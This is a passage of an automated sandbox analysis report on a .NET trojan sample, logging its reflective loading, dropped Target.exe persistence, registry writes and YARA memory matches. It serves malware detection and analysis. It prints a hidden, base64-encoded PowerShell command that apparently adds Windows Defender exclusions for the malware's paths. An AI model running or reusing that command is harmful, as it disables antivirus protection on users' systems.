                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC106DB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681802941.000001FC71D90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10753000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC106DB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681802941.000001FC71D90000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10753000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, 00000000.00000002.1681644399.000001FC71D40000.00000004.08000000.00040000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CAD17000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000003.00000002.1723437634.000001B0CACC7000.00000004.00000800.00020000.00000000.sdmp, Target.exe, 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, Error.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe, Schema.cs.Net Code: ForgotSchema System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d90000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc107030b0.0.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc1068b040.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc1068b040.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc1068b040.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc1068b040.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc1068b040.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d40000.10.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d40000.10.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d40000.10.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d40000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc71d40000.10.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA
                      Source: Yara matchFile source: 3.2.Target.exe.1b0cabd63b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Target.exe.1b0cac763e8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc10306308.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f51e355560.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f51e37d598.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc105363b0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc10306308.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f51e5d63e8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f51e5363b0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc105d63e8.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc1032e340.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f50e09c528.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc70500000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f51e355560.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.Target.exe.1f50e09c528.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1723437634.000001B0CAC76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1675197443.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1723437634.000001B0CABD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1681390450.000001FC70500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1677637412.000001FC10536000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2236493693.000001F51E536000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2236493693.000001F51E5D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2236493693.000001F51E306000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1710027843.000001B0BA6A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2232552237.000001F50E018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4115219254.000001DC43E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe PID: 6256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Target.exe PID: 6616, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Target.exe PID: 1544, type: MEMORYSTR
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: 0xA760533F [Thu Dec 26 05:57:19 2058 UTC]
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA35A95 push ecx; retf 5F33h0_2_00007FFD9BA35ADC
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA3842E pushad ; ret 0_2_00007FFD9BA3845D
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeCode function: 0_2_00007FFD9BA3845E push eax; ret 0_2_00007FFD9BA3846D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B77D2A5 pushad ; iretd 1_2_00007FFD9B77D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8985FA push ebx; retn 000Ah1_2_00007FFD9B89863A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B89863D push ebx; retn 000Ah1_2_00007FFD9B89863A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B890952 push E95ADAD0h; ret 1_2_00007FFD9B8909C9
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8CD88B push 8B485F4Ah; iretd 4_2_00007FFD9B8CD890
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8E3231 push eax; retf 4_2_00007FFD9B8E3249
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8FB0EB push ds; iretd 4_2_00007FFD9B8FB12F
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8CD851 push 8B485F4Ah; iretd 4_2_00007FFD9B8CD85B
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8C3BCD push ebp; retf 4_2_00007FFD9B8C3BD0
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8B9338 push esp; ret 4_2_00007FFD9B8B9549
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9B8C60B5 pushfd ; ret 4_2_00007FFD9B8C60F1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA229DA push eax; retf 4_2_00007FFD9BA229FD
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA1785E push eax; iretd 4_2_00007FFD9BA1786D
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA17850 pushad ; iretd 4_2_00007FFD9BA1785D
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA1757B push ebx; iretd 4_2_00007FFD9BA1756A
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeCode function: 4_2_00007FFD9BA1755A push ebx; iretd 4_2_00007FFD9BA1756A
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeStatic PE information: section name: .text entropy: 7.958809477078381
                      Source: Target.exe.0.drStatic PE information: section name: .text entropy: 7.958809477078381

                      Persistence and Installation Behavior

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.1675197443.000001FC00346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe PID: 6256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Target.exe PID: 6616, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeFile created: C:\Users\user\AppData\Roaming\XsdType\Target.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: Yara matchFile source: 00000000.00000002.1675197443.000001FC00346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe PID: 6256, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Target.exe PID: 6616, type: MEMORYSTR

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\26d19999dcc6916aedeba96cfef5e476 9F5D511A35C11A2E2510B2394FAB93ECJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
